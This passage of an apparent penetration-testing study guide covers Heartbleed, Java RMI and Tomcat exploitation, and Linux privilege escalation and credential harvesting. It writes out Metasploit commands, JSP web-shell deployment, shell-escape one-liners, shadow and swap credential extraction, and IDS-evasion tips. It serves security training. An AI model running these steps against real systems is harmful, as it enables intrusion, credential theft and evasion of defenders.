~/.msf4/loot$ strings file.bin

We can see that we've successfully leaked the username and password for a user of the application.
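What strings does, pulling printable ASCII runs out of binary data, is easy to replicate if you want to post-process loot files programmatically. A minimal sketch; the sample blob is illustrative, not real Heartbleed output:

```python
import re

def extract_strings(data: bytes, min_len: int = 4):
    """Return printable-ASCII runs of at least min_len bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]

# Simulated leaked-memory blob (illustrative).
blob = b"\x00\x16\x03user=admin\x01\x02password=s3cret\x9f\x00"
print(extract_strings(blob))  # ['user=admin', 'password=s3cret']
```

In practice you would read the loot file with open(path, "rb").read() and scan every run for credential-looking substrings.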

A note about Heartbleed

When using the exploit scripts and modules in circulation, if you don't get any "leaked" data from your first run of a specific tool, try again. You will find that different contents appear at different times within the leaked memory segment of an application.

Exploiting Java RMI Registry - Study Guide

One usually under-appreciated and overlooked class of vulnerabilities consistently found on penetration tests are those involving Java APIs, particularly services which offer a way to invoke Java methods remotely, also known as Java RMI.

In particular, there exists a vulnerability in default configurations of the RMI Registry and RMI Activation services that affects what is known as the "RMI Distributed Garbage Collector" and essentially allows the loading of arbitrary Java classes from an attacker-defined URL.

The Java RMI Registry service is typically found on port 1099 TCP and can be fingerprinted with an nmap version scan (-sV); on Linux systems, it is identified by the GNU Classpath grmiregistry fingerprint, as seen in the scan output below:

nmap -sT <ip_address> -p 1099 -sV

In addition to the nmap version detection method, Metasploit includes a scanner module for detecting vulnerable RMI endpoints, as well as an exploit module, exploit/multi/misc/java_rmi_server, which we can use:

msf > use exploit/multi/misc/java_rmi_server
msf > show options

The SRVHOST option is set to 0.0.0.0 by default, which means it will listen on every network interface; it is recommended to leave that option as is. The SRVPORT option can be left at its default unless you're already running a service on TCP 8080, in which case the module will fail to bind to the port. If that occurs, just set SRVPORT to a port that isn't currently in use on your system.

The SRVHOST and SRVPORT options essentially define the web server from which the target will download the Java payload.

For additional IDS or Endpoint Detection evasion (if required for your specific target), you may also want to set SSL to true.

This can help in evading (some) on-the-wire heuristics detection solutions. However, most will flag many Metasploit modules' default SSL certificates. Hence the SSLCert option which allows you to specify your own custom SSL certificate for the SRVHOST.

As a general rule of thumb, in regard to Metasploit modules and exploits, where possible, always configure a custom SSL certificate for your listeners, etc.

This goes a long way in evading Intrusion Detection Systems. Metasploit has been around a long time, and defenders have heavily analyzed the source code, and have written detection capabilities for most modules in their default configurations. Once we've configured our options, we can attempt to exploit the target:

msf exploit(multi/misc/java_rmi_server) > run -j

We can then interact with our session and drop into a shell:

msf exploit(multi/misc/java_rmi_server) > sessions -i 1

Once again, we can upgrade our shell:

python -c 'import pty; pty.spawn("/bin/sh")'

Important

The RMI Registry endpoint can sometimes be found listening on non-standard ports. It's recommended that when assessing a target for this vulnerability, you scan all 65535 TCP ports in case the RMI Registry has been configured to listen on a port other than 1099 TCP.

That goes for virtually any service.

Administrators will often change default listening ports for many common services, so be sure to conduct comprehensive port scans against your chosen targets.

Exploiting Java Deserialization - Study Guide

One particular class of vulnerabilities falls under the domain of "Java Deserialization of untrusted data". This is one of the most "unspoken" vulnerability classes; however, these flaws exist in a wide variety of applications, and the range of affected systems is likely very high, with recent research showing that popular Java-based applications such as JBoss, WebLogic, WebSphere and Jenkins, to name a few, are affected.

To explain it simply, serialization is a process which allows applications to convert data into a binary format suitable for saving to disk or sending over the network.

This process is vulnerable to the deserialization of untrusted "malicious" data, which can be supplied by the user and is ultimately deserialized by the application, resulting in code execution, in most cases without even requiring authentication.
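The Java gadget chains used in real attacks are beyond this section, but the core risk is language-agnostic. An analogous Python pickle sketch shows how deserializing untrusted bytes can invoke arbitrary callables; a harmless os.getcwd stands in for a real payload:

```python
import os
import pickle

class Malicious:
    # __reduce__ tells pickle how to rebuild an object on load; an attacker
    # can return any importable callable, e.g. os.system with a shell command.
    def __reduce__(self):
        return (os.getcwd, ())  # harmless stand-in for a real payload

untrusted_bytes = pickle.dumps(Malicious())

# The victim "just deserializes data", and os.getcwd() runs as a side effect.
result = pickle.loads(untrusted_bytes)
print(result)
```

This is exactly why deserializing attacker-controlled input is dangerous regardless of language: the data format itself can encode a call to code.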

If you'd like to experiment with Java Deserialization vulnerabilities in a test environment, you can find a great post on how to create a small, vulnerable environment at the following link:

References

Exploiting Tomcat - Study Guide

Apache Tomcat is a widely used, free and open-source web server, primarily for Java-based web applications. One of the primary issues we encounter on engagements is the use of default or weak credentials on administrative interfaces of any number of appliances, web server applications, etc.

Tomcat has been known in the past to ship with default credentials, and often, System Administrators will leave them be for ease-of-use, forget about changing the defaults, or whatever the case may be.

In terms of real-world experience, we encounter Apache Tomcat on most engagements at a very high frequency; since a Microsoft Windows version is available as well, it is a primary go-to for in-house Java-based web application servers.

Tomcat includes an area within its administrative interface known as the "Tomcat Manager", which allows administrators to quickly view internal Tomcat configuration settings and system statistics and, most importantly for our purposes, provides a method to easily deploy Java applications.

Determining if an Apache Tomcat server is using default credentials can be as easy as simply browsing to its web interface (typically found on port 8180 TCP) and trying some of the known defaults manually. Services can be configured on whatever port the administrator desires, so always make sure to scan non-standard ports for common applications.

As Penetration Testers, the more efficiently we can conduct and automate certain tasks, the more time we have for exploitation and writing reports.

Metasploit includes an excellent utility for conducting password-guessing attacks against Apache Tomcat servers, the "Tomcat Application Manager Login Utility". You can load it from the following location via the Metasploit console:

msf > use auxiliary/scanner/http/tomcat_mgr_login

For this Manager Login Module, we can (most of the time) stay with the defaults and successfully crack the login, assuming it has been left with its default credentials, which is frequently the case. Once we set our RHOSTS and RPORT options, and set STOP_ON_SUCCESS to true, we can run the scanner module. Metasploit will use its built-in dictionaries to check for default credentials.

Once we have valid credentials for the Tomcat Manager, we can explore our options in regard to exploiting this access and, ultimately, taking control of the system.

Note

Experiment with the Tomcat Manager Login utility using different username lists, password dictionaries, etc. Don't hesitate to use those same techniques in case a target application or appliance isn't configured with default credentials.

Once we have access to the Tomcat Manager area of the web server, we can see some already deployed applications. We also have a couple of different options available to us in regard to deploying our own Java application.

The quickest way to exploit this scenario is to use tools that are already available to us. You can download Laudanum or find it on Kali Linux in the /usr/share/laudanum directory. Within the jsp directory we can see a pre-compiled cmd.war application that should be ready for use.

The cmd.war application is essentially a Java web application which, if deployed successfully, will allow control of the server and remote command execution. Uploading and deploying the war file is straightforward and only requires that we browse to the Laudanum cmd.war file and upload it. Once we click the 'Deploy' button, confirm the application is listed in the upper section of the Manager interface.

If the application deployed correctly, we can browse to it at the following URL: http://<ip_address>:8180/cmd/cmd.jsp. This will allow us to execute commands on the system from the JSP shell. From here, there are multiple ways we can obtain a reverse shell from this system.
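A WAR file is just a ZIP archive with a particular layout, so a minimal cmd.war-style package can be assembled with standard tooling. The JSP body below is abbreviated and illustrative (Laudanum's cmd.jsp is far richer):

```python
import io
import zipfile

# A trivial JSP command-shell body (illustrative placeholder).
cmd_jsp = b'<%@ page import="java.util.*,java.io.*" %><%-- runs request param "cmd" --%>'

buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as war:
    war.writestr("cmd.jsp", cmd_jsp)                # served at /<app>/cmd.jsp
    war.writestr("WEB-INF/web.xml", b"<web-app/>")  # minimal deployment descriptor

buf.seek(0)
with zipfile.ZipFile(buf) as war:
    names = war.namelist()
print(names)  # ['cmd.jsp', 'WEB-INF/web.xml']
```

Writing buf.getvalue() to cmd.war would give a file the Tomcat Manager accepts for deployment, which is why pre-built shells like Laudanum's are simply re-zippable archives.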

Post Exploitation

Post Exploitation Introduction - Study Guide

At this stage, you've conducted your initial enumeration, have been able to use the acquired information to obtain access to several machines, and now it's time to move into the post-exploitation phase:

  • Perform additional information gathering and enumeration of any systems from a local perspective (shell, console, etc.)

  • Elevate our privileges

  • Maintain a foothold

  • Pivot to other systems

  • Utilize methods to exfiltrate data

Our first task is to gather additional information about the system, including users, permissions, installed applications, how software is configured, and other things about the system which will help us in our quest for root.

There are many commands and things we can do once we've gotten access to a Linux machine. The process for post-exploitation can be broken down into several distinct categories, which can be further broken down into sub-categories:

  • Additional Information Gathering

  • Privilege Escalation

  • Lateral Movement

  • Data Exfiltration

  • Managing Access

Privilege Escalation - Study Guide

In regard to gathering information related to privilege escalation once access to a host has been obtained, there are several sub-categories we can use to distinguish the different types of information we will gather. This information is generally divided as follows:

  • System and Network Information

    • Hostname

      • Does the hostname reveal anything about the system's function? Can we leverage that information to gain access to function-related information?

      • Related Command: hostname

    • Kernel Version

      • Is the kernel vulnerable to any exploits?

      • Related Command: uname -a

    • Operating System

      • Does our current OS have any known exploitable vulnerabilities?

      • Related Command: cat /etc/issue

    • IP address

      • ifconfig

    • Running processes

      • ps auxw

    • Network Routes

      • Is our currently compromised machine routed to other networks? Can we use this information to pivot?

      • Related Command: route -n

    • DNS Server

      • Can we obtain information from the DNS Server? Active Directory Accounts, Zone Transfers, etc.

      • Related Command: cat /etc/resolv.conf

    • ARP Cache

      • Have other machines communicated with the target? Are those machines accessible from the target?

      • Related Command: arp -a

    • Current Network Connections

      • Are there any established connections from our machine to other machines and vice-versa? Are the connections over encrypted or non-encrypted channels? Can we sniff the traffic of those connections?

      • Related Command: netstat -auntp

  • User Information

    • Current user permissions

      • Can our current user access sensitive information/configuration details that belong to other users?

      • Related Command: find / -user username

    • UID and GID information for all users

      • How many users are on the system? What groups do they belong to?

      • Can we modify files belonging to users in other groups?

      • Related Command: for user in $(cat /etc/passwd | cut -f1 -d":"); do id $user; done

    • Last Logged on users

      • Who's been on the system? From what systems?

      • Can we pivot to those other systems using credentials we might already have?

      • Related Command: last -a

    • Root Accounts

      • How many UID 0 (root) accounts are on the system?

      • Can we log in as those accounts?

      • Related Command: cat /etc/passwd

    • Home Directories

      • Do we have access to other users' home directories?

      • Is any of the information contained in those directories useful to us?

      • Related Command: ls -als /home/*

  • Privileged Access / Cleartext Credentials

    • Can the current user execute anything with elevated privileges?

      • Related Command: sudo -l

    • Are there any setuid root (SUID) binaries on the system which may be vulnerable to privilege escalation?

      • Related Command: find / -perm -4000 -type f 2>/dev/null

    • Can we read configuration files that might contain sensitive information, passwords, etc?

      • Related Command: grep "password" /etc/*.conf 2> /dev/null

    • Can we read the shadow file? If so, can we crack any of the hashes?

      • Related Command: cat /etc/shadow

    • Can we list or read the contents of the /root directory?

      • Related Command: ls -als /root

    • Can we read other users' history files?

      • Related Command: find /* -name "*.*history*" -print 2>/dev/null

    • Can we write to directories that are configured to serve web pages?

      • Related Command: touch /var/www/file

  • Services

    • Which services are configured on the system and what ports are they opening?

      • Related Command: netstat -auntp

    • Are service configuration files readable or modifiable by our current user?

      • Related Command: find /etc/init.d/ ! -uid 0 -type f 2>/dev/null | xargs ls -la

    • Can we modify the configuration of a service in such a way that gives us elevated privileges?

      • Related Command: Edit Service Configuration File

    • Do the configuration files contain any information we can use to our advantage? (i.e., credentials, etc.).

      • Related Command: cat /etc/mysql/my.cnf

    • Can we stop or start the service as our current user?

      • Related Command: service service_name start/stop

    • What actions take place as a result of being able to stop and start services? (no related command)

  • Jobs/Tasks

    • What tasks or jobs is the system configured to run and at which times?

      • Related Command: cat /etc/crontab

      • Related Command #2: ls -als /etc/cron.*

    • Are there any custom jobs or tasks configured as root that are world-writable?

      • Related Command: find /etc/cron* -type f -perm -o+w -exec ls -l {} \;

    • Can we modify any of the existing tasks at all?

      • Related Action: try and modify cron jobs

  • Installed Software Version Information

    • What software packages are installed on the system?

      • Related Command: dpkg -l

    • What versions? Are the installed packages out-of-date and vulnerable to existing available exploits?

      • Related Command: dpkg -l

      • Related Command: searchsploit "httpd 2.2"

    • Does any of the installed software allow us to modify its configuration files, and could this result in gaining privileged access to the system?

      • Related Action: Try and modify package configurations
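Several of the user-information checks above are easy to script rather than eyeball, for example hunting for extra UID 0 accounts in /etc/passwd. A minimal sketch over sample data:

```python
def root_accounts(passwd_text: str):
    """Return account names whose UID field is 0 in passwd-format text."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0":
            names.append(fields[0])
    return names

# Sample passwd contents (illustrative); note the second UID 0 account.
sample = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "toor:x:0:0:backdoor:/root:/bin/bash\n"
)
print(root_accounts(sample))  # ['root', 'toor']
```

On a live system you would feed it open("/etc/passwd").read(); any UID 0 name besides root deserves immediate attention.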

Much of this information can be gathered either manually or through the use of automated tools, which is a bit more time efficient when on an engagement.

One particular tool of note is LinEnum.

Cleartext Credentials in Configuration Files

LinEnum

LinEnum will automate much of the information gathering and enumeration phase for us, and there are also a great number of resources available to use as a reference for commands regarding the information gathering and enumeration process as it relates to post-exploitation.

In order to use LinEnum once on a system, we'll need to download it onto the target (via wget or nc).

While using nc, beware that all traffic is unencrypted and may be detected by an IDS or other anomalous-traffic detection mechanisms implemented within an organization.

Once downloaded: chmod +x LinEnum.sh.

  • -h : help.

  • -k : search configuration files for a string such as "password"; this can often reveal credentials for other services which we can use for further exploitation.

Alternatively, we can get similar results manually by using the grep command like so:

grep -r password /etc/*.conf 2> /dev/null

Other methods:

# find dotfiles with "history" in their names
find /* -name "*.*history*" -print 2>/dev/null

# Grep the apache access.log file for "user" and "pass" strings
cat /var/log/apache/access.log | grep -E "^user|^pass"

# Dump cleartext Pre-Shared Wireless Keys from Network Manager
cat /etc/NetworkManager/system-connections/* | grep -E "^id|^psk"
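The same kind of credential sweep can be scripted when grep output needs filtering or you are working from a limited shell. A minimal sketch over a sample config file; the paths and contents are illustrative:

```python
import os
import tempfile

def grep_file(path: str, needle: str):
    """Return lines in path containing needle, skipping unreadable files."""
    try:
        with open(path, errors="replace") as f:
            return [line.rstrip("\n") for line in f if needle in line]
    except OSError:
        return []

# Sample config standing in for /etc/*.conf (illustrative).
conf = os.path.join(tempfile.mkdtemp(), "app.conf")
with open(conf, "w") as f:
    f.write("host=db01\npassword=hunter2\ntimeout=30\n")

print(grep_file(conf, "password"))  # ['password=hunter2']
```

Looping grep_file over glob.glob("/etc/*.conf") mirrors the grep one-liner above, with the unreadable-file errors silently skipped instead of cluttering the output.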

Another Metasploit post module for Linux you'll find useful is the enum_system module, which will gather the Linux version, user accounts, installed packages, cron jobs and more from an existing Metasploit shell session.

There are also several other Metasploit post modules we can use for post-exploitation of a Linux system. Experiment with these modules to see how they can help you further exploit a Linux machine.

msf > use post/linux/*

SUID Binaries

SUID or "setuid" executables are a blessing in disguise when it comes to privilege escalation opportunities. Executable files with the setuid attribute, when executed, run as the owner of the file (the EUID, or Effective User ID) regardless of the current user's privileges.

$ ls -las /bin/ping
60 -rwsr-xr-x 1 root root 61240 Nov 10 2016 /bin/ping
# s attr: setuid attribute set for a root-owned binary

The reason ping is configured as a SUID root binary is that it, by its very nature, uses "raw sockets" to generate and receive ICMP packets, and that activity requires root access.

The passwd executable, responsible for enabling users to change their passwords, is also SUID root, due to the fact that it needs to write to the /etc/passwd and /etc/shadow files.
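The setuid bit can also be checked programmatically from a file's mode bits. The sketch below sets the bit on a throwaway file we own and then tests for it:

```python
import os
import stat
import tempfile

def is_suid(path: str) -> bool:
    """True if the setuid bit is set on path (the 's' in rwsr-xr-x)."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)

# Demonstrate on a temp file we own; on a real engagement you would stat
# candidates found via: find / -perm -4000 -type f 2>/dev/null
fd, path = tempfile.mkstemp()
os.close(fd)
os.chmod(path, 0o4755)  # rwsr-xr-x
print(is_suid(path))  # True
```

Note the bit only matters for privilege escalation when the file is owned by root (or another privileged user) and is executable by us.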

Let's take a look at the following C code as an example:

modcat.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char ** argv) {
    // Takes a file or other object as an argument to our program
    if (argc<2) {
        printf("Reads a file. No file name provided.\n");
    } else {
        // Executes /bin/cat on our file
        execv("/bin/cat", argv);
        perror("exec");
    }
}

After the code is compiled, a typical command line for our "modcat" would be modcat /etc/passwd, which would simply print the contents of that file. Now consider that an administrator has given that same executable the SUID attribute, with the file owned by root. In that case, we would be able to run modcat to display the contents of /etc/shadow, since the binary runs as root due to the setuid bit being set and the file being owned by root.

This modcat example can be trivially exploited to obtain root access to a system.

nmap is another example of a setuid binary sometimes found on Linux systems. Older versions of nmap contained an interactive shell which could be launched via the --interactive switch. Once in interactive mode, and assuming the nmap executable was SUID root, simply running !sh in the interactive nmap console would land the user in a root shell.

The glibc '$ORIGIN' expansion privilege escalation, discovered by Tavis Ormandy, is an interesting example related to SUID executables. It exploits the GNU C Library dynamic linker (glibc versions before 2.11.3, and 2.12.x versions up to 2.12.1) and takes advantage of glibc's failure to restrict the use of the LD_AUDIT environment variable when loading SUID executables, combined with $ORIGIN expansion in the library search path, ultimately resulting in the execution of an arbitrary shared object (.so file).

Although this vulnerability was initially disclosed in 2010, a Linux exploit module was added to Metasploit in January 2018; it also provides a good example of how privilege escalation can be obtained through the exploitation of environment variables related to SUID executables.

There's a Metasploit module:

msf > use exploit/linux/local/glibc_origin_expansion_priv_esc

Sudo Privileged Access

sudo misconfigurations are another important finding as they relate to privilege escalation. sudo is used to provide privileged access to users on a temporary basis, allowing users to run commands as another user (usually root); when that elevated access is required, a user can simply run sudo command.

In order for a user to be able to utilize sudo, an entry is required in the /etc/sudoers configuration file. We can retrieve our sudoers status once we're on the system:

sudo -l

A standard user will typically not be able to view the /etc/sudoers file directly.

The NOPASSWD directive indicates that the user won't be required to enter a password.

Shell Escape via less:

  • If we take a look at its man entry, we can see that as part of its functionality, it allows a user to execute shell commands (a shell escape) with the ! command.

  • This allows a user to execute shell commands from inside less.

  • If our user is in the /etc/sudoers file and can execute less on certain files as root (in this case, any file in /var/log/*), less will effectively be executed as root.

  • We can also execute the !sh command to escape to a shell, followed by the id command to check our UID/GID information.

There are more examples of binaries on Linux that allow the user to execute shell commands. The vi/vim editors also allow breaking out into a shell via the !sh method, or executing any shell command for that matter.

The following is a list of some common executables that, if present in the sudoers file, can give us root shells through different means. The commands below (e.g., !sh) are sometimes referred to as "shell escapes" and are executed from within the executables themselves:

  • less (via !sh)

  • more (via !sh)

  • vi/vim (via !sh)

  • nmap (--interactive + !sh)

  • ftp (!sh)

  • gdb (!sh)

  • python

  • perl

  • irb

  • lua

Aside from programs that allow shell commands to be executed with the ! feature, many others exist that, with some experimentation and exploration, allow the execution of arbitrary shell scripts or commands when passed as arguments on the command line.

man arbitrary command execution via Pager argument:

  • For instance, the man program, short for "manual", is essentially the command reference guide built into the Linux OS.

  • We use man to view "man pages" when we need to reference a particular program. If we want the man page for the id program we simply call man id.

  • The man program usually utilizes the more or less programs to display its pages depending on its configuration.

  • The program it uses for this purpose is known as the "pager", and can be specified with the -P switch when running man. If we look at the man page for man we can see what the pager option is about: man man.

  • Due to a quirk in how the man program handles the pager argument -P , we can run any command we want: man -P "id" man

  • Now, considering we are allowed to execute man via sudo , we can execute whatever we want as root through man: sudo man -P "cat /etc/shadow" man.

docker sudo privilege escalation:

  • Although privilege escalation vectors related to sudo have existed since the inception of Linux, one of the more recent examples of a sudo exploit requires that docker is installed on the target system and is defined as an entry in the /etc/sudoers file to be executed as root, similar to the previous sudoers entries we've seen.

  • This particular technique abuses docker by compiling shellcode for a root shell within a container, setting the SUID attribute on the resulting exploit binary, and launching a root shell.

Restricted Shells:

  • Restricted shells are another topic we should become familiar with, as they are often encountered in the field in hardened environments where users require access to servers but administrators would like to limit the commands those users can execute.

  • You may be more familiar with the term chroot jail when it comes to restricted shells.

  • A chroot jail is a way to isolate users and their processes from the rest of the OS.

  • All programs defined for a chroot jail are run in their own directory structure, with their own shared libraries and environment settings.

  • One of the more common implementations of restricted shells utilizes the rbash shell, which is set as the user's shell at logon, along with pre-defined environment variables.

  • rbash, when combined with a chroot jail, can be rather effective; however, administrators often rely on rbash alone, which opens up several ways to break out of the restricted shell.

  • When rbash shell is defined for users, some of the commands that are usually restricted are:

    • The ability to change into other directories (cd)

    • Specifying absolute path names or file names containing (/) or (-)

    • Setting or unsetting the PATH environment variable

    • Using ENV or BASH_ENV for setting or unsetting other environment variables

    • Using bash output redirection operators (>, >>, >|, <>, >&, &>)

    • Disabling restricted mode using the set +r or set +o restricted commands

  • You can usually tell you're in a restricted shell when you start seeing "restricted" errors as you attempt to execute usual commands like cd, or when trying to redirect the output of a command to a file.

  • One of the first things we can do to confirm we're in a restricted shell is to run the env command to get a better understanding of how the environment is configured and what the current shell is; specifically, the $PATH and $SHELL environment variables.

  • Combined with the restricted errors we're seeing and an inability to run some typical shell commands, we can be sure we're in a restricted shell.

  • There are a great number of things we can try to break out of this restricted shell:

    • As previously mentioned, less, vim and nmap (among others) offer the ability to escape into a shell with the ! method. These can certainly be used to attempt to get out of our restricted shell, assuming of course that the restricted shell allows us to run those binaries in the first place.

    • Restricted shell escape with VI/VIM:

      • Open a file and then run :!sh and hit <enter>.

      • This results in getting us a regular /bin/sh shell outside of our restricted rbash shell.

    • Restricted shell escape with find:

      • Another trick we can use to break out of a restricted shell is with the find command coupled with the -exec argument: find /home/bob -name test -exec /bin/sh \;

      • This command is looking for a file named "test" in the /home/bob directory and if found, will execute whatever follows the -exec switch.

    • Restricted shell escape with python or perl:

      • It may be unlikely that you will be able to execute python, perl or irb while in a restricted shell, but if you find you can:

        • python -c 'import pty; pty.spawn("/bin/sh")'

        • perl -e 'exec "/bin/sh";'

    • Restricted shell escape from another system with SSH:

      • If we have SSH credentials to a system for a user that is configured with a restricted shell, we can try to break out of the shell remotely from another system by executing a shell with SSH before the restricted shell is initialized on the target:

        • ssh restricted_user@targetserver -t "/bin/sh"
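The find escape above can be rehearsed safely on any system by swapping /bin/sh for a harmless command; the directory and file names below are placeholders:

```shell
# Create a scratch directory with a file named "test", then show that
# whatever follows -exec runs once per match (here: echo instead of /bin/sh,
# so the demo doesn't open an interactive shell).
d=$(mktemp -d)
touch "$d/test"
find "$d" -name test -exec echo "command executed for {}" \;
rm -rf "$d"
```

In a real escape, replacing echo with /bin/sh drops you into an unrestricted shell, because find itself (not rbash) is what spawns the child process.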

Cracking the Shadow

Imagine you've exploited a machine and have a Metasploit session or a reverse shell on the system as root, through a web-based or other exploit, but don't have any valid credentials to re-use for moving laterally to other systems as a user that exists on your current exploited machine.

Sometimes a shell isn't enough, and we require credentials to further our objectives, move laterally from one machine to another, masquerade through a network using valid credentials, etc.

In the event we have a shell on a machine as root, there are several things we can do to obtain some valid credentials. One of those involves cracking the password hashes in the /etc/shadow file.

The /etc/passwd and /etc/shadow files are responsible for maintaining the database of users on a Linux system and are directly manipulated by the /usr/bin/passwd program, among other programs, whenever changes are made to any existing users or passwords.

Some Unix passwd History:

  • Before the mid-80's, both usernames and password hashes were stored in a single file (/etc/passwd).

  • In an effort to better secure the file from dictionary and brute force attacks against the hashes by any user, developers introduced "Shadowing" of passwords via a separate file.

  • The /etc/shadow file we know today is only readable by root and by SUID-root programs such as /usr/bin/passwd.

The /etc/passwd file stores general user information, including the current home directory, UID value, GID value, login shell and any descriptive information for a particular user, and can be read by any standard user.

The /etc/shadow file, in contrast, stores the users' passwords in a hashed format, in addition to other things such as password expiration information, whether the user is required to change their password on next logon, min/max time between password changes and several other parameters.

The password hash is the second field, immediately after the username. The fields are separated by a colon (:).

The /etc/shadow file can only be read by root and by the passwd program, along with several other programs that require the ability to modify the /etc/passwd and /etc/shadow files.

In current versions of Linux, the hashes in the shadow file are stored as SHA-512 and can be quickly recognized by the $6$ at the beginning of the hash.

Older versions may be using SHA-256 or MD5 which can be identified by $5$ and $1$ respectively.
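That prefix check is easy to script; the shadow entry below is fabricated for illustration (the hash is not real):

```shell
# Pull the second colon-separated field (the hash) and branch on its
# $id$ prefix to name the algorithm.
entry='alice:$6$examplesalt$notarealhash:19000:0:99999:7:::'
hash=$(printf '%s' "$entry" | cut -d: -f2)
case "$hash" in
  '$6$'*) echo "SHA-512" ;;
  '$5$'*) echo "SHA-256" ;;
  '$1$'*) echo "MD5" ;;
  *)      echo "unknown/other" ;;
esac
# -> SHA-512
```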

Once we've gotten a shell and are either able to execute commands as root, or we are root for that matter, we can execute a dictionary attack against the hashes in the /etc/shadow file.

Consideration must be given to whether or not the hashes are using SHA-512, SHA-256 or MD5:

  • MD5 ($1$) hashes will be easiest to crack.

  • Depending on the complexity of the password, SHA-256 ($5$) and SHA-512 ($6$) may be a bit more difficult.

  • In all cases, if the password is weak, we can likely crack it regardless of the hashing algorithm.

Another point to note is that we'll want to crack the hashes offline once both the /etc/passwd and /etc/shadow files are copied to our attacker system. There are several reasons for this:

  • We make less noise on the target system.

  • Our target likely doesn't have the tools we need to crack the hashes.

  • Perhaps we require a machine with more processor power to launch our dictionary attack.

Once we've gotten copies of those two files, we can use a tool known as "unshadow" along with the "John the Ripper" password cracking tool to crack the hashes. Unshadow is distributed with John the Ripper.

unshadow passwd shadow > shadow.john
john shadow.john --wordlist=<wordlist>
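If the unshadow binary happens to be unavailable, its core behavior (splicing each shadow hash into the "x" placeholder field of the matching passwd line) can be approximated with awk. The sample entries below are fabricated:

```shell
# Write fabricated passwd/shadow-format samples, then merge them:
printf 'bob:x:1000:1000::/home/bob:/bin/bash\n' > passwd.sample
printf 'bob:$6$salt$notarealhash:19000:0:99999:7:::\n' > shadow.sample

# First pass (NR==FNR) caches user->hash from the shadow file; second
# pass substitutes the cached hash for the 'x' field of each passwd line.
awk -F: 'NR==FNR {h[$1]=$2; next} {$2=h[$1]; print}' OFS=: \
    shadow.sample passwd.sample
# -> bob:$6$salt$notarealhash:1000:1000::/home/bob:/bin/bash

rm -f passwd.sample shadow.sample
```

The merged format is exactly what John the Ripper expects as input.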

MimiPenguin

If cracking the root or other users' passwords is out of the realm of possibility due to hash strength or password complexity, we can try to obtain the root password directly from the machine's memory using MimiPenguin.

It works similarly to the well-known mimikatz for Windows but is designed for Linux and attempts to dump cleartext credentials from memory from the following applications:

  • GDM password (Kali Desktop, Debian Desktop)

  • Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop)

  • VSFTPd (Active FTP Connections)

  • Apache2 (Active HTTP Basic Auth Sessions)

  • OpenSSH (Active SSH Sessions - Sudo Usage)

There are two different scripts available: a shell script and a Python script. Each has its pros and cons; some features supported in the Python script are not available in the shell script. It's recommended to try both when assessing the target.

Pilfering Credentials From Swap Memory

Staying along the lines of dumping credentials directly from memory, we can also dump sensitive information from the swap file. Since everything is a "file" in Linux, so is swap space, and we can use that to our advantage with built-in tools.

One caveat to this technique is that it has to be done as the root account and may also be prone to false positives, as it's difficult to ascertain exactly where in swap sensitive information will be temporarily stored. The partition or "file" defined as swap can be found with the following command:

swapon -s

We can obtain the exact same information by issuing:

cat /proc/swaps

The process from here is straightforward. We can run the strings command against the /dev/sdaX partition and grep for the strings we're looking for:

strings /dev/sda5 | grep "password="
strings /dev/sda5 | grep "&password="

A shell script can also be written to automate searching for common sensitive strings within the swap file.
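A minimal sketch of such an automation, run here against a scratch file standing in for the swap device, since reading /dev/sdaX itself requires root (the keyword list and file names are illustrative):

```shell
# Stand-in for the swap device; on a target you would point the grep at
# the partition reported by swapon -s (e.g. /dev/sda5).
printf 'binary junk \0\0 password=hunter2 more junk login=bob\n' > swap.dump

# -a treats binary data as text, -o prints only the matching fragments;
# the alternation folds several keyword searches into a single pass.
grep -aoE '(password|passwd|login|user)=[^[:space:]&"]+' swap.dump | sort -u

rm -f swap.dump
```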

Code Execution via Shared Object Library Loading

Hijacking Dynamically Linked Shared Object Libraries (.so files) is another method we can use to obtain elevated privileges on a Linux system under certain conditions.

Similar to Microsoft Windows' Dynamic-Link Libraries (DLLs), Shared Object libraries are essentially their equivalent on Linux systems, providing applications with functions that are resolved at runtime by referencing .so files.

There are two primary types of libraries we'll encounter in our Linux travels:

  • Static Libraries (.a): code that is compiled into an application.

  • Dynamically Linked Shared Object Libraries (.so): these can either be linked to the application at load time, or loaded, linked and unloaded during the application's execution.

More info: http://www.yolinux.com/TUTORIALS/LibraryArchives-StaticAndDynamic.html

When a Linux application is executed, one of the first things that happens under the hood, if it uses Shared Objects, is that it searches for those Shared Objects in the following order:

  1. Any directories specified by -rpath-link options (RPATH)

  2. Any directories specified by -rpath options (RPATH)

  3. If the -rpath and -rpath-link options are not used, it will then search the contents of the environment variables LD_RUN_PATH and LD_LIBRARY_PATH

  4. Directories defined in the DT_RUNPATH dynamic section entry first; if that doesn't exist, then DT_RPATH.

  5. Then, the default lib directories, normally /lib and /usr/lib.

  6. Finally, any directories defined in the /etc/ld.so.conf file.

Before we go into further details, there are some things we need to determine before we continue:

  1. Determine the shared objects that are being loaded by an executable.

  2. Determine if the application was compiled with RPATH or RUNPATH options. If yes, can we write into the locations specified by either of those options?

Determine the shared object libraries that are being loaded by an executable

We can do this with the ldd command. To see the shared objects loaded by the /usr/local/bin/program executable, we run:

ldd /usr/local/bin/program

From its output, once we've determined whether the executable was compiled with RPATH or RUNPATH options, we can work out which of the linked Shared Objects we can hijack.

If we find that the executable was in fact compiled with RPATH or RUNPATH options, we will be able to drop our payload in the directories defined by either of those options.

Determine if the executable was compiled with RPATH or RUNPATH options

For determining whether an executable was compiled with RPATH or RUNPATH options, we can use the objdump command.

objdump -x /usr/local/bin/program | grep RPATH
objdump -x /usr/local/bin/program | grep RUNPATH

If the executable in question was compiled with the RPATH or RUNPATH options, the objdump output will be similar to the below:

RPATH /tmp/program/libs
RUNPATH /tmp/program/libs

Imagine that we have determined that the program executable was indeed compiled with RPATH options pointing to /tmp/program/libs. Since we also know that RPATH is checked for linked Shared Objects before the /lib or /usr/lib directories, we can place our "malicious" .so file in /tmp/program/libs, and it should be loaded whenever the executable is launched. Let's look at the ldd output of the program executable:

libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x0000007fbadf120000)
